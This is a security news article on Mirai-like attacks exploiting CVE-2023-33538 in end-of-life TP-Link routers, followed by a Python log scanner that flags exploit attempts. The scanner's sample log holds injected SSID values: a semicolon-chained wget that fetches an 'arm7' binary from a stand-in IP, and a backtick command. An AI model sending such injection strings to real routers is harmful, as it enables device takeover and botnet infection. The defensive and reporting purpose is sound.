
TP-Link Routers Targeted by Mirai in CVE-2023-33538 Attacks


Hackers are currently engaged in extensive scans for vulnerable TP-Link home routers, aiming to deploy malware reminiscent of the infamous Mirai botnet by exploiting a specific vulnerability, designated CVE-2023-33538. This latest surge of automated attacks raises significant concerns within the cybersecurity community, particularly because it targets end-of-life devices.

Though researchers have noted that the ongoing exploit attempts display technical flaws, they caution that the underlying vulnerability is both legitimate and perilously potent, particularly when it is paired with default access credentials and firmware that is no longer supported. The affected models—including TL-WR940N versions 2 and 4, TL-WR740N versions 1 and 2, and TL-WR841N versions 8 and 10—are all classified as end-of-life, meaning they do not receive any further security updates.

The vulnerability can be traced back to the router’s web management interface, specifically at the /userRpm/WlanNetworkRpm.htm endpoint. Here, the device processes parameters linked to Wi-Fi configuration, presenting a route for potential exploitation. As researchers have detailed, CVE-2023-33538 is characterized as a command injection vulnerability. This flaw allows specially crafted input in the SSID field to be executed directly as a shell command without any prior sanitization, granting attackers the capability to run arbitrary system commands on the compromised device.

Public documentation, alongside archived proof-of-concept exploits, has outlined how this particular parameter can be manipulated to execute high-level system commands on the affected firmware. Following the addition of CVE-2023-33538 to the CISA (Cybersecurity and Infrastructure Security Agency) catalogue of Known Exploited Vulnerabilities in June 2025, researchers noted a significant uptick in automated HTTP GET requests aimed at the vulnerable endpoint.

Malicious actors have been observed attempting to inject command chains specifically through the SSID field to download an ELF binary referred to as ‘arm7’ from a designated IP address. This binary is crucial to the attack, as static and dynamic analyses have identified it as a Mirai-like payload, with numerous references to the “condi” family, which has previously been documented in various IoT botnets.

Upon successful execution, the ‘arm7’ binary connects to a command-and-control server to process customizable command sequences. It also possesses the ability to update itself across different CPU architectures, effectively converting infected routers into distributed denial-of-service (DDoS) bots. While the scanning activity appears relentless, researchers have confirmed that the observed exploits are riddled with critical implementation errors.

One significant issue arises from targeting the wrong SSID parameter, as the actual vulnerable input is the ssid1 field. Because of this mistake, injected commands never reach the code path that would run them as a shell command. Furthermore, effective exploitation demands an authenticated session with the router’s web interface. Yet, in the observed traffic, attackers are only supplying basic admin:admin credentials, neglecting to establish a legitimate session token as required by the firmware’s login protocol.

Finally, many of the malicious exploit chains depend on tools such as wget for downloading malware. However, the tested TP-Link firmware comes with a limited BusyBox environment that does not include common download utilities, thereby restricting these particular payloads. Despite these shortcomings in the exploit attempts, researchers have verified through firmware emulation and reverse engineering that the vulnerability itself remains exploitable, particularly when an attacker possesses valid credentials and crafts the request with precision.

The execFormatCmd() function is crucial in this scenario as it invokes the tp_SystemEx() function to execute commands formatted with the injected content, like “iwconfig %s essid %s”. As such, default or weak passwords on internet-exposed routers continue to pose a critical threat, transforming this authenticated vulnerability into an easily exploitable pathway for botnet infection.

Recognizing the severity of the situation, TP-Link has announced that the affected models are beyond their lifecycle and will not receive additional patches. They have advised users to consider replacing these outdated devices with models that are still supported while also recommending that individuals avoid utilizing default credentials.

The situation has prompted cybersecurity experts and organizations to advocate for additional hardening measures. These include disabling remote management features, segmenting IoT devices from sensitive networks, and enforcing strong, unique passwords for admin access. For organizations employing enterprise security platforms, it is crucial to detect or block related activity through layers such as URL/DNS filtering, intrusion prevention, and advanced malware analysis. This defense strategy should particularly flag any traffic directed towards known Mirai-related infrastructure.
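As an added illustration (not code from the article or from the researchers it cites), the Python script below implements the kind of detection the paragraph above calls for: it flags HTTP requests to the /userRpm/WlanNetworkRpm.htm endpoint whose ssid1 or ssid parameter carries shell metacharacters or exceeds the 32-byte SSID limit. The simplified log format and the sample log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter names come from the article; the log line format
# (client "METHOD url HTTP/x.y" status) is a constructed simplification.
VULN_PATH = "/userRpm/WlanNetworkRpm.htm"
SSID_PARAMS = ("ssid1", "ssid")  # ssid1 is the actually vulnerable input
# Characters that never belong in an SSID but that a shell would interpret.
SHELL_META = re.compile(r"[;|&`$(){}<>\n]")
LOG_RE = re.compile(
    r'^(?P<client>\S+) "(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})$'
)

def parse_line(line):
    """Split one access-log line into client, path, decoded query and status."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes
    return rec

def check_request(rec):
    """Return a reason if the request looks like a CVE-2023-33538 attempt, else None."""
    if rec["path"] != VULN_PATH:
        return None
    for name in SSID_PARAMS:
        for value in rec["query"].get(name, []):
            if len(value.encode()) > 32:
                return f"{name} longer than the 32-byte SSID maximum"
            if SHELL_META.search(value):
                return f"shell metacharacter in {name}"
    return None

def scan_log(lines):
    """Return (client, status, reason) for every suspicious request in the log."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None and (reason := check_request(rec)):
            hits.append((rec["client"], rec["status"], reason))
    return hits

# Constructed sample: one legitimate save, one scanner request rejected for lack
# of a session (401), an unrelated page, and a backtick payload that got a 200.
SAMPLE_LOG = """\
203.0.113.7 "GET /userRpm/WlanNetworkRpm.htm?ssid1=HomeNet&region=1&Save=Save HTTP/1.1" 200
203.0.113.9 "GET /userRpm/WlanNetworkRpm.htm?ssid1=x%3Bwget+http%3A%2F%2F203.0.113.9%2Farm7&Save=Save HTTP/1.1" 401
198.51.100.4 "GET /userRpm/StatusRpm.htm HTTP/1.1" 200
203.0.113.9 "GET /userRpm/WlanNetworkRpm.htm?ssid=%60id%60&Save=Save HTTP/1.1" 200
""".splitlines()
```

The status code is kept in each hit because, as the article notes, exploitation requires an authenticated session, so a 200 on a flagged request deserves a faster response than a 401.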

In an era characterized by increasing attacks on IoT routers, incident response teams strongly recommend swiftly replacing vulnerable TP-Link units. Moreover, any unusual outbound connections or repeated login attempts from these devices should be investigated immediately to preempt potential cyber threats.
